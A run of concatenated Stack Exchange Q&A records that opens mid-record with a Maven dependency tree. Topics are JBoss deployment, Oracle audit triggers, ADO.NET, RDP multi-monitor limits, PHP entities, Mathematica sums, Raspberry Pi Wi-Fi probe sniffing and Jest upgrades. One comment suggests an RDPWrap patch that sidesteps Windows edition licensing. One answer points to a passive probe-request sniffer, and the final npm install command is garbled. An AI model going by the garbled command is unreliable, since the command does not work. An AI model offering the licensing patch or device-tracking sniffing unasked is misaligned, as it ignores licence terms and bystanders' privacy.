net.sf.oval:oval:jar:1.40:compile\n[INFO] | +- ([proprietary-jar-7]:jar:3.8.1-SNAPSHOT:compile - omitted for duplicate)\n[INFO] | 
+- ([proprietary-jar-14]:jar:3.8.1-SNAPSHOT:compile - omitted for duplicate)\n[INFO] | +- ([proprietary-jar-8]:jar:3.8.1-SNAPSHOT:compile - omitted for duplicate)\n[INFO] | +- org.apache.commons:commons-collections4:jar:4.0:compile\n[INFO] | +- (commons-httpclient:commons-httpclient:jar:3.1:compile - omitted for duplicate)\n[INFO] | +- (commons-io:commons-io:jar:1.4:compile - omitted for duplicate)\n[INFO] | +- (commons-lang:commons-lang:jar:2.3:compile - version managed from 2.5; omitted for duplicate)\n[INFO] | +- commons-logging:commons-logging:jar:1.1.1:compile\n[INFO] | +- com.itextpdf:itextpdf:jar:5.1.2:compile\n[INFO] | +- (net.sf.json-lib:json-lib:jar:jdk15:2.4:compile - omitted for duplicate)\n[INFO] | +- (log4j:log4j:jar:1.2.14:compile - version managed from 1.2.16; omitted for duplicate)\n[INFO] | +- (struts:struts:jar:1.1:compile - omitted for duplicate)\n[INFO] | +- (com.thoughtworks.xstream:xstream:jar:1.2.2:compile - omitted for duplicate)\n[INFO] | +- ([proprietary-jar-4]:compile - omitted for duplicate)\n[INFO] | +- [proprietary-jar-5]:1.4.0:compile\n[INFO] | | +- (javax.xml.bind:jaxb-api:jar:2.1:compile - omitted for duplicate)\n[INFO] | | +- (org.aspectj:aspectjrt:jar:1.6.8:compile - version managed from 1.6.2; omitted for duplicate)\n[INFO] | | +- org.aspectj:aspectjweaver:jar:1.6.8:compile\n[INFO] | | +- (org.springframework:spring-aop:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-beans:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-context:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-core:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-orm:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (commons-beanutils:commons-beanutils:jar:1.7.0:compile - version managed from 1.8.0; omitted for duplicate)\n[INFO] | | +- (commons-lang:commons-lang:jar:2.3:compile - version managed from 2.5; omitted for duplicate)\n[INFO] | | +- (org.slf4j:slf4j-api:jar:1.5.6:compile - omitted for duplicate)\n[INFO] | | +- (org.slf4j:slf4j-log4j12:jar:1.5.6:compile - omitted for duplicate)\n[INFO] | | \\- (log4j:log4j:jar:1.2.14:compile - version managed from 1.2.16; omitted for duplicate)\n[INFO] | +- ([proprietary-jar-3]:2.4.0:compile - omitted for duplicate)\n[INFO] | +- ([proprietary-jar-11]:jar:184.108.40.206:compile - omitted for duplicate)\n[INFO] | +- org.springframework:spring-beans:jar:3.0.7.RELEASE:compile\n[INFO] | | \\- (org.springframework:spring-core:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | +- org.springframework:spring-context:jar:3.0.7.RELEASE:compile\n[INFO] | | +- (org.springframework:spring-aop:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-beans:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-core:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- org.springframework:spring-expression:jar:3.0.7.RELEASE:compile\n[INFO] | | | \\- (org.springframework:spring-core:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | \\- 
org.springframework:spring-asm:jar:3.0.7.RELEASE:compile\n[INFO] | +- org.springframework:spring-core:jar:3.0.7.RELEASE:compile\n[INFO] | | +- (org.springframework:spring-asm:jar:3.0.7.RELEASE:compile - omitted for duplicate)\n[INFO] | | \\- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0; omitted for duplicate)\n[INFO] | +- org.springframework:spring-orm:jar:3.0.7.RELEASE:compile\n[INFO] | | +- (org.springframework:spring-beans:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-core:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-jdbc:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | \\- (org.springframework:spring-tx:jar:3.0.7.RELEASE:compile - version managed from 3.0.6.RELEASE; omitted for duplicate)\n[INFO] | +- org.springframework:spring-tx:jar:3.0.7.RELEASE:compile\n[INFO] | | +- (aopalliance:aopalliance:jar:1.0:compile - omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-aop:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-beans:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-context:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | \\- (org.springframework:spring-core:jar:3.0.7.RELEASE:compile - version managed from 2.5.6; omitted for duplicate)\n[INFO] | +- (org.springframework:spring-test:jar:3.0.7.RELEASE:compile - omitted for duplicate)\n[INFO] | \\- [proprietary-jar-1]:jar:1.3:compile\n[INFO] | +- (commons-codec:commons-codec:jar:1.8:compile - version managed from 1.3; omitted for duplicate)\n[INFO] | \\- (org.springframework.security:spring-security-core:jar:3.0.7.RELEASE:compile - omitted for duplicate)\n[INFO] +- [proprietary-jar-13]:jar:3.8.1-SNAPSHOT:compile\n[INFO] | \\- ([proprietary-jar-2]:compile - omitted for duplicate)\n[INFO] +- [proprietary-jar-14]:jar:3.8.1-SNAPSHOT:compile\n[INFO] | +- ([proprietary-jar-7]:jar:3.8.1-SNAPSHOT:compile - omitted for duplicate)\n[INFO] | +- commons-digester:commons-digester:jar:1.8.1:compile (version managed from 1.8)\n[INFO] | | +- (commons-beanutils:commons-beanutils:jar:1.7.0:compile - version managed from 1.8.0; omitted for duplicate)\n[INFO] | | \\- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0; omitted for duplicate)\n[INFO] | +- org.apache.cxf:cxf-rt-ws-security:jar:2.7.10:compile\n[INFO] | | +- org.apache.cxf:cxf-api:jar:2.7.10:compile\n[INFO] | | | +- org.codehaus.woodstox:woodstox-core-asl:jar:4.2.0:compile\n[INFO] | | | | \\- org.codehaus.woodstox:stax2-api:jar:3.1.1:compile\n[INFO] | | | +- (org.apache.ws.xmlschema:xmlschema-core:jar:2.1.0:compile - omitted for duplicate)\n[INFO] | | | +- org.apache.geronimo.specs:geronimo-javamail_1.4_spec:jar:1.7.1:compile\n[INFO] | | | \\- wsdl4j:wsdl4j:jar:1.6.3:compile\n[INFO] | | +- (org.apache.cxf:cxf-rt-core:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | +- org.apache.cxf:cxf-rt-bindings-soap:jar:2.7.10:compile\n[INFO] | | | +- (org.apache.cxf:cxf-api:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | | \\- org.apache.cxf:cxf-rt-databinding-jaxb:jar:2.7.10:compile\n[INFO] | | | +- (org.apache.cxf:cxf-api:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | | +- (org.apache.cxf:cxf-rt-core:jar:2.7.10:compile - omitted 
for duplicate)\n[INFO] | | | \\- (com.sun.xml.bind:jaxb-impl:jar:2.1.13:compile - omitted for duplicate)\n[INFO] | | +- net.sf.ehcache:ehcache-core:jar:2.5.1:compile\n[INFO] | | | \\- (org.slf4j:slf4j-api:jar:1.6.1:compile - omitted for conflict with 1.5.6)\n[INFO] | | +- org.apache.ws.security:wss4j:jar:1.6.14:compile\n[INFO] | | | +- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0; omitted for duplicate)\n[INFO] | | | +- org.apache.santuario:xmlsec:jar:1.5.6:compile\n[INFO] | | | | \\- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0; omitted for duplicate)\n[INFO] | | | \\- org.opensaml:opensaml:jar:2.5.1-1:compile\n[INFO] | | | \\- org.opensaml:openws:jar:1.4.2-1:compile\n[INFO] | | | \\- org.opensaml:xmltooling:jar:1.3.2-1:compile\n[INFO] | | | +- (org.slf4j:slf4j-api:jar:1.6.1:compile - omitted for conflict with 1.5.6)\n[INFO] | | | +- joda-time:joda-time:jar:1.6.2:compile\n[INFO] | | | \\- (org.apache.santuario:xmlsec:jar:1.4.4:compile - omitted for conflict with 1.5.6)\n[INFO] | | \\- (commons-logging:commons-logging:jar:1.1.1:compile - version managed from 1.0; omitted for duplicate)\n[INFO] | +- org.apache.cxf:cxf-rt-transports-http:jar:2.7.10:compile\n[INFO] | | +- (org.apache.cxf:cxf-api:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | \\- (org.apache.cxf:cxf-rt-core:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | +- org.apache.cxf:cxf-rt-frontend-jaxws:jar:2.7.10:compile\n[INFO] | | +- xml-resolver:xml-resolver:jar:1.2:compile\n[INFO] | | +- asm:asm:jar:3.3.1:compile\n[INFO] | | +- (org.apache.cxf:cxf-api:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | +- (org.apache.cxf:cxf-rt-core:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | +- (org.apache.cxf:cxf-rt-bindings-soap:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | +- org.apache.cxf:cxf-rt-bindings-xml:jar:2.7.10:compile\n[INFO] | | | \\- (org.apache.cxf:cxf-api:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | +- org.apache.cxf:cxf-rt-frontend-simple:jar:2.7.10:compile\n[INFO] | | | +- (org.apache.cxf:cxf-api:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | | +- (org.apache.cxf:cxf-rt-core:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | | \\- (org.apache.cxf:cxf-rt-bindings-soap:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | \\- org.apache.cxf:cxf-rt-ws-addr:jar:2.7.10:compile\n[INFO] | | +- (org.apache.cxf:cxf-api:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | +- (org.apache.cxf:cxf-rt-bindings-soap:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | \\- org.apache.cxf:cxf-rt-ws-policy:jar:2.7.10:compile\n[INFO] | | +- (org.apache.cxf:cxf-api:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | +- (org.apache.cxf:cxf-rt-core:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | \\- org.apache.neethi:neethi:jar:3.0.3:compile\n[INFO] | +- org.apache.cxf:cxf-rt-core:jar:2.7.10:compile\n[INFO] | | +- (org.apache.cxf:cxf-api:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | | +- com.sun.xml.bind:jaxb-impl:jar:2.1.13:compile\n[INFO] | | \\- org.apache.ws.xmlschema:xmlschema-core:jar:2.1.0:compile\n[INFO] | +- oro:oro:jar:2.0.7:compile\n[INFO] | +- commons-fileupload:commons-fileupload:jar:1.2.2:compile\n[INFO] | +- org.springframework.security:spring-security-config:jar:3.0.7.RELEASE:runtime\n[INFO] | | \\- (org.springframework.security:spring-security-core:jar:3.0.7.RELEASE:runtime - omitted for duplicate)\n[INFO] | +- 
org.springframework:spring-context-support:jar:3.0.7.RELEASE:runtime\n[INFO] | | +- (org.springframework:spring-beans:jar:3.0.7.RELEASE:runtime - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | +- (org.springframework:spring-context:jar:3.0.7.RELEASE:runtime - version managed from 2.5.6; omitted for duplicate)\n[INFO] | | \\- (org.springframework:spring-core:jar:3.0.7.RELEASE:runtime - version managed from 2.5.6; omitted for duplicate)\n[INFO] | \\- org.springframework.security.extensions:spring-security-kerberos-core:jar:1.0.0.M2:runtime\n[INFO] +- [proprietary-jar-14]:jar:model1:3.8.1-SNAPSHOT:compile\n[INFO] | +- ([proprietary-jar-7]:jar:3.8.1-SNAPSHOT:compile - omitted for duplicate)\n[INFO] | +- (commons-digester:commons-digester:jar:1.8.1:compile - version managed from 1.8; omitted for duplicate)\n[INFO] | +- (org.apache.cxf:cxf-rt-ws-security:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | +- (org.apache.cxf:cxf-rt-transports-http:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | +- (org.apache.cxf:cxf-rt-frontend-jaxws:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | +- (org.apache.cxf:cxf-rt-core:jar:2.7.10:compile - omitted for duplicate)\n[INFO] | +- (oro:oro:jar:2.0.7:compile - omitted for duplicate)\n[INFO] | +- (commons-fileupload:commons-fileupload:jar:1.2.2:compile - version managed from 1.2; omitted for duplicate)\n[INFO] | +- (org.springframework.security:spring-security-config:jar:3.0.7.RELEASE:runtime - omitted for duplicate)\n[INFO] | +- (org.springframework:spring-context-support:jar:3.0.7.RELEASE:runtime - omitted for duplicate)\n[INFO] | \\- (org.springframework.security.extensions:spring-security-kerberos-core:jar:1.0.0.M2:runtime - omitted for duplicate)\n[INFO] +- [proprietary-jar-15]:jar:3.8.1-SNAPSHOT:compile\n[INFO] | +- ([proprietary-jar-7]:jar:3.8.1-SNAPSHOT:compile - omitted for duplicate)\n[INFO] | +- ([proprietary-jar-12]:jar:3.8.1-SNAPSHOT:compile - omitted for duplicate)\n[INFO] | \\- ([proprietary-jar-14]:jar:3.8.1-SNAPSHOT:compile - omitted for duplicate)\n[INFO] +- com.ibm.db2.jcc:db2jcc_license_cu:jar:9.7:test\n[INFO] \\- com.ibm.db2.jcc:db2jcc4:jar:9.7fp5:test\n<\/code>\nAny help?\n<code>Caused by: java.io.IOException: Child not found [war project]\/WEB-INF\/lib\/spring-security-core-3.0.7.RELEASE.jar for DelegatingHandler@263476109[path=[war project]\/WEB-INF\/lib\/divautils-1.3.jar\ncontext=file:\/C:\/app\/jboss\/jboss-5.1.0.GA-2\/server\/default\/deploy\/ real=file:\/C:\/app\/jboss\/jboss-5.1.0.GA-2\/server\/default\/deploy\/[war project]\/WEB-INF\/lib\/divautils-1.3.jar], available childr\nen: [ZipEntryHandler@131683849[path=[war project]\/WEB-INF\/lib\/divautils-1.3.jar\/META-INF context=file:\/C:\/app\/jboss\/jboss-5.1.0.GA-2\/server\/default\/deploy\/ real=file:\/C:\/app\/jboss\/jboss-5.1.0.\nGA-2\/server\/default\/deploy\/[war project]\/WEB-INF\/lib\/divautils-1.3.jar\/META-INF], ZipEntryHandler@1302293733[path=[war project]\/WEB-INF\/lib\/divautils-1.3.jar\/com context=file:\/C:\/app\/jboss\/jboss-5.1.0.GA-2\/server\/default\/deploy\/ real=file:\/C:\/app\/jboss\/jboss-5.1.0.GA-2\/server\/default\/deploy\/[war project]\/WEB-INF\/lib\/divautils-1.3.jar\/com]]\n<\/code>\nComment: That's the error....you should look for the cause, the part of the log that tells you what caused the error.\nComment: Omoro, I added the full stack. The cause says that the spring jar was not found. 
But if I open the war file, it is there...\nThanks for the help\nComment: Did you build using maven, if yes, please show us the dependency details.\nComment: Hi Bennet, Yes, I used Maven. I posted the dependency tree. Thanks!\nComment: Please paste the dependency details. not tree.\nComment: \norg.apache.geronimo.specs\ngeronimo-annotation_1.0_spec\n1.1.1\njar\ncompile\n try this dependency in your pom.xml and build the application and try deploying it\nAnswer: Please forgive me. This was a totally misleading error I was getting and the problem was caused by a different application. After removing all applications from the server but the one I was testing, it started to work.\nSorry for this.\n","meta":{"source":"stackoverflow","title":"Error deploying CXF web service on JBoss","dup_signals":{}},"subset":"stackexchange"} +{"text":"Auditing logged in user with delete trigger\n\nQuestion: We have an audit option in our application, where we are auditing the deleted records from a table using AFTER DELETE ON trigger. \nProblem description :\nThe problem that we face here is, we need to log the person who has deleted the record. We could not get id of the person deleted the record anywhere from the database as its not present. Its coming from the web application. My question is there anyway to get the name or id of the person who has logged into the web application in the database side.\nWe are using oracle 11g.\nAnswer: You should be able to do this using dbms_session package.Using the package you can set and get values.Hence , during the login to your application , you can set the value and finally while on delete trigger execution , get this and insert into the audit table.\nThis might come handy - http:\/\/www.dba-oracle.com\/t_dbms_session.htm\nHope that helps !\nComment: Thanks for the suggestion. have a question regd that. 
Can this approach handle concurrent access of the application by more than one users?\nComment: Definitely it can.You can try it by logging these values into a table at transaction level and verify the same.\n","meta":{"source":"stackoverflow","title":"Auditing logged in user with delete trigger","dup_signals":{}},"subset":"stackexchange"} +{"text":"call component from form to class and save data back to table\n\nQuestion: i am working on ado.net project,, i used to have separate classes for codes ,,, \nnow i am trying to learn more about local databases but i am stock when i tried to call class that contain SQL commands ,,, please \nhave a look to my code i commented where i stock\n<code> namespace Maintenance\n {\n public partial class registerReports : Form\n {\n private void btnSave_Click(object sender, EventArgs e)\n {\n \/\/the code works if it exists here\n \/**\n conn.Open();\n com.Parameters.AddWithValue(\"@reportID\",\n tbReportIDox.Text);\n com.ExecuteNonQuery();\n conn.Close();\n **\/\n }\n }\n }\n<\/code>\n\n<code> class reportTableSQL \n {\n public void reportTable()\n {\n string connectionString = connectionString = \"Data Source=\n ..\/\/..\/\/maintenanceDB.sdf\";\n SqlCeConnection conn = new SqlCeConnection(connectionString);\n\n using (SqlCeCommand com = new SqlCeCommand(\"INSERT INTO\n ReportForm VALUES(@reportID)\", conn))\n {\n \/\/ if i call this method from class registerReports : Form\n \/\/ it doesn't recognise tbReportIDox.Text as\n \/\/it isn't exist in this class\n\n \/**\n conn.Open();\n com.Parameters.AddWithValue(\"@reportID\",\n tbReportIDox.Text);\n com.ExecuteNonQuery();\n conn.Close();\n **\/\n }\n }\n }\n<\/code>\nthank you \nAnswer: What you can do is to pull <code>tbReportIDox.Text<\/code> up as a parameters to the method, that is\n<code>public void reportTable(string reportName)\n{ \n ...\n com.Parameters.AddWithValue(\"@reportID\", reportName);\n ...\n}\n<\/code>\nAnd then on a button click\n<code>private void btnSave_Click(object sender, EventArgs e)\n{\n \/\/ resolve instance of reportTableSQL class\n \/\/ for example through: new reportTableSQL();\n var reportGenerator = new reportTableSQL();\n reportGenerator.reportTable(tbReportIDox.Text);\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"call component from form to class and save data back to table","dup_signals":{}},"subset":"stackexchange"} +{"text":"Alternatives to RDP under Windows 7 Professional using 2 monitors\n\nQuestion: My PC at work has Windows 7 Professional Edition which I know I cannot use the regular RDP to connect using 2 monitors.\nIs there any alternative I can use to connect to a Windows 7 Professional Edition via RDP?\nComment: What's this about two monitors? What doesn't work?\nComment: Windows 7 Professional Edition doesn't support RDP with multiple monitors. I was wondering If I can make it work using an alternative. [See this link for more info](http:\/\/windows.microsoft.com\/en-US\/Windows7\/Remote-Desktop-Connection-frequently-asked-questions)\nComment: Off topic. 
Belongs on SuperUser.\nAnswer: Just to clear this up\nWindows 7 pro can use true multiple monitors when it is the client (connecting to server 2008\/windows 7 ult or enterprise)\nWhen it is the HOST (ie the one you are connecting to) it will only allow single monitor connections to it, the span option works to stretch the session over 2 screens but it ISNT true multimonitor mode\nSorry sam but you cant connect to windows 7 pro in tru multimon mode, the screenshot you have shown is the remote desktop client, hence why the options are there\nComment: Actually, it can work if you install RDPWrap - https:\/\/github.com\/stascorp\/rdpwrap - it doesn't say, but it enables multimon rdp support in win 7 pro as well. Yay! :)\nAnswer: The situation is that when Win7 Pro is the host (meaning it is the remote machine), it does NOT provide multiple monitor support.\nNo matter what settings you use on the client, you will get only a single monitor, if the host is Win7 Pro. Period.\nThe sad fact is that the Win7 FAQ - for a long time - said ALL versions of Win7 supported multiple monitors through RDP, without qualification.\nAfter many users complained of this failing with Win7 Pro as the host, Microsoft fixed it - by changing the FAQ. Frankly, Microsoft owes this feature to all Win7 users, but Win8 is now the new (and obviously, at the time of this writing, failed) focus of attention.\nThere ARE programs out there that patch Windows Home to have full RDP hosting (actually, the 2008 server version, which allows multiple remote desktops). Apparently it is a single DLL and, possibly, some registry changes. I have no idea if they'd work for Pro, but my guess is that they would.\nThat said, if you have an IT department managing your host PC, you probably can't do this, and will have spend $130 to use the Anytime upgrade to the Ultimate version.\nThis despite the fact that the overwhelming desktop being remotely connected to at businesses is Pro. Yeah, I think MS just found a possible cash cow, and of course won't ever admit it, or live up the promise they made via their FAQ for quite a long time.\nAnswer: Win7 does have duel monitor support\nWinXP does not\nAs long as the PC you are using, and the PC you are connected to is Win7, there should not be a problem. Also the PC you are Using the RDP connection from must have duel screens. If not you well have to use a VNC like Teamviewer.\nSee below\nComment: Professional does support that ability. We are using Win 7 Professional and We have that ablity. Are you sure your not using Home Edition.\nComment: As I mentioned, I'm using Windows 7 Professional Edition. Only Enterprise or Ultimate have support for dual monitors.\nComment: Yes I'm sure. Are you able to connect to Natalie-PC (the PC with Windows Professional) from another computer using 2 monitors using RDP?\nComment: this is really weird. it can't. it's posted every where it can't. And i am unable to that that on my win7 professional. \naside all that. i wouldn't wanna be the guy using rpd to a machine with only 2gb of mem.\n","meta":{"source":"stackoverflow","title":"Alternatives to RDP under Windows 7 Professional using 2 monitors","dup_signals":{}},"subset":"stackexchange"} +{"text":"PHP Form Variables and POST - HTML Encoded Strings\n\nQuestion: I am not strong on my PHP knowledge, but I have never seen this before. 
In a config file, there are a list of options defined in an array like so:\n<code>$testarray[] = \"None\";\n$testarray[] = \"Item 1 with normal text\";\n$testarray[] = \"Item 2® with html encoded string\";\n$testarray[] = \"Item3® with another html encoded string\";\n<\/code>\nSo now, when the form is generated, it does a simple for each loop to create a list of radio buttons:\n<code>foreach ( $testarray as $key=>$item){\necho '<div id=\"padBottom\"><input type=\"radio\" name=\"formItem\"';\n if ( $item == $_SESSION['ss']['selection']) echo ' checked=\"checked\"';\n echo ' value=\"' . $item. '\" \/>' . $item. '<\/div>';\n}\n<\/code>\nSo far so good, the form generates like it should. The part that is not working is the If statement portion. On the page that this form posts to, it does a simple call to set <code>$_SESSION['ss']['selection'] = $_POST['formItem'];<\/code> When this happens, the value that goes into session is the actual registered trademark symbol and not <code>'®'<\/code> as I would expect. As a result, if you select an item with the HTML encoded entity in it, we are not getting a match and your selection appears to be lost. In this example, choosing the first or second option results in the proper radio button being selected - if you choose option 3 or 4, then no selection appears to have been made when you return to this screen. \nAddtional info - the charset for this page is UTF-8 if that makes any difference here.\nThings I have tried\n\nhtmlspecialchars on the POST variable in the next page: result, nothing, still showing actual symbol.\nhtmlspecialchars on the form value for each radio option: result, I get <code>&reg;<\/code> as part of my value which doesn't display well.\nAnswer: Some characters (including ampersands) have special meaning in HTML, you have to represent them as entities if you don't want that special meaning to take effect.\nIn this case, it is the variable you are inserting into the value attribute that you need to encode.\nComment: thanks for the input. I knew it had something to do with html encoding, I just hadn't tried the right combination yet. I tried #1 above and then #2 above with #1 still in place and that didn't work. But just simply html encoding the value and not again on the post worked great. Thanks!\nAnswer: It might work better if you used the index of the item, rather than its contents, as the index is just a number in this case:\n<code>foreach ( $testarray as $key=>$item) {\n echo '<div id=\"padBottom\"><input type=\"radio\" name=\"formItem\"';\n if ( $key == $_SESSION['ss']['selection']) echo ' checked=\"checked\"';\n echo ' value=\"' . $key .'\" \/>' . $item. 
'<\/div>';\n}\n<\/code>\nComment: Yeah i agree, I would much rather use integer keys than string matching, but alas, that is not what was given to me from the last programmer and I am not about to refactor this steaming pile o' code :)\n","meta":{"source":"stackoverflow","title":"PHP Form Variables and POST - HTML Encoded Strings","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to integrate a symbolic sum?\n\nQuestion: I'm trying to integrate a function that involves a finite sum:\n$$\\int_{-\\infty}^{\\infty}\\sum_{j=1}^n (e^{-b t^2}r_j) \\,dt$$\nI think it should be possible to take the exponent outside the sum:\n$$\\int_{-\\infty}^{\\infty}\\left(e^{-b t^2} \\sum_{j=1}^n r_j \\right)dt=\\sum_{j=1}^n r_j \\times \\int_{-\\infty}^{\\infty}e^{-b t^2} dt$$\nI write it in Mathematica like this:\n<code>$Assumptions=_\\[Element]Reals\nAssuming[\nb>0,\nIntegrate[Sum[Exp[-b t^2]*r[j],{j,1,n}],{t,-\\[Infinity],+\\[Infinity]}]\n]\n<\/code>\nThis, however, simply returns the integral unchanged:\n$$\\int_{-\\infty }^{\\infty } \\left(\\sum _{j=1}^n e^{-b t^2} r(j)\\right)\\, dt$$\nIf I specify a number for $n$, I get the expected result:\n$$\\frac{\\sqrt{\\pi } (r(1)+r(2)+r(3)+r(4)+r(5))}{\\sqrt{b}}$$\n\nHow do I extract $e^{-bt^2}$ outside the sum? Alternatively, how do I bring the integral inside the sum? More generally, how do I integrate this?\nComment: @Domen, this is a simplified example. I actually have a bigger expression that'll get really long if I extract everything manually. I could probably integrate this by hand, but I was hoping that Mathematica can automate this for me.\nComment: This is a Mathematica limitation. Sorry.\nComment: Why don't you move it outside yourself? ``Sum[r[j], {j, 1, n}]*Integrate[Exp[-b t^2], {t, -\\[Infinity], +\\[Infinity]}]``\nComment: `Simplify` and `FullSimplify` also can't bring a constant factor outside the sum: `FullSimplify[Sum[a*Indexed[r, j], {j, 1, n}]]` returns the sum of `a*r_j` (as opposed. to `a` times the sum of `r_j`), but specifying a number instead of `n` correctly produces `a*(r_1+r_2+...)`\nComment: I think the reason is that you can exchange sum and integrate if the sum is known to be finite. See [when-can-a-sum-and-integral-be-interchanged](https:\/\/math.stackexchange.com\/questions\/83721\/when-can-a-sum-and-integral-be-interchanged\/83747) and here Mathematica does not know the sum is finite of not, because it does not know `r[j]` is finite. For example, if you replace `r[j]` with just `j` then it works. `ClearAll[b,n,j,r,t];\nf[t_]:=Sum[Exp[-b t^2]*j,{j,1,n}];\nAssuming[Element[b,Reals]&&b>0,Integrate[f[t],t]]` and gives `(n*(1 + n)*Sqrt[Pi]*Erf[Sqrt[b]*t])\/(4*Sqrt[b])` ...\nComment: .. so if someone can figure how to tell Mathematica that the sum is `finite` or `r[j]` is finite, then may be there will be a better chance to have it work.\nComment: @Nesser, I tried adding assumptions like `Indexed[r, j] > 0 && Indexed[r, j] < 1` to both the sum and the integral, but this didn't change anything. I also tried adding `n > 0 && n < 6` to these assumptions to indicate that the sum is finite, but this didn't help either...\nAnswer: Using <code>linearExpand<\/code> from How to do algebra on unevaluated integrals? :\n<code>Clear[linearExpand];\nlinearExpand[e_, x_, head_] := \n e \/\/. 
{op : head[arg_Plus, __] :> Distribute[op], \n head[arg1_Times, rest__] :> \n With[{dependencies = Internal`DependsOnQ[#, x] & \/@ List @@ arg1}, \n Pick[arg1, dependencies, False] head[\n Pick[arg1, dependencies, True], rest]]};\n\nlinearExpand[Sum[Exp[-b t^2]*r[j], {j, 1, n}], j, Sum]\n<\/code>\n\n<code>Assuming[b > 0,\n Integrate[\n linearExpand[Sum[Exp[-b t^2]*r[j], {j, 1, n}], j, Sum],\n {t, -\\[Infinity], +\\[Infinity]}]\n ]\n<\/code>\nAnswer: Use a replacement <code>Rule<\/code> to swap the order when appropriate.\n<code>Clear[\"Global`*\"]\n\nswap = Integrate[Sum[f_, iter1_, opts1___], iter2_, opts2___] :> \n Sum[Integrate[f, iter2, opts2], iter1, opts1];\n\nexpr[n_Integer?Positive] = Assuming[b > 0, (Integrate[\n Sum[Exp[-b t^2]*r[j], {j, 1, n}], {t, -\u221e, +\u221e}] \/. swap)]\n\n(* Sum[(Sqrt[Pi]*r[j])\/Sqrt[b], {j, 1, n}] *)\n\nexpr[5] \/\/ Simplify\n\n(* (Sqrt[\u03c0] (r[1] + r[2] + r[3] + r[4] + r[5]))\/Sqrt[b] *)\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"How to integrate a symbolic sum?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Catching Probe Requests using monitor mode in Raspberry pi 3\n\nQuestion: I wanna catch probe requests of mobile devices that are not connected to a network using monitor mode on Raspberry pi 3. I am using Raspbian OS. I used \"Wifite\" command but it only shows the mac addresses of access points and not of the non connected mobile device. I am a beginner in networking and Raspberry pi. Kindly guide me which commands should I use for this purpose?\nAnswer: You might try looking into sniff-probes.\nIt switches WiFi channels every two seconds and captures incoming packets using <code>tcpdump<\/code>.\n","meta":{"source":"stackoverflow","title":"Catching Probe Requests using monitor mode in Raspberry pi 3","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to update Jest testing framework in create-react-app?\n\nQuestion: I already have an application created with <code>create-react-app<\/code> package.\nI found a bug with the version of Jest which is 15.1.1. But I realized that in version 16 the bug is gone.\nHow to update Jest?\nMy problem is in the package.json of application there is no Jest package.\nJest is in other folder: node_modules\/react-scripts.\nAnswer: Create React App updates its dependencies once they are stable enough. This usually means waiting a week or two after the new release.\nWe don't recommend updating anything by yourself unless this is absolutely critical. If you choose to eject to update something we recommend making it a single commit so that you can revert it later once Create React App uses that version internally. \nComment: Currently Create React App uses Jest 24, which is a year old. Is one week not a thing anymore?\nComment: When can we expect CRA to start using Jest 26?\nComment: This doesn't answer the question. Wait a week and then do what?\nAnswer: The following commands are going to get the job done:\n<code>npm run eject\nnpm install --save-dev firstname.lastname@example.com\n<\/code>\nBut be careful here! The <code>eject<\/code> command irreversibly eliminates the abstraction layer of <code>create-react-app<\/code> exposing all of the dependencies and configuration to you. Though, your app is going to work just like before. 
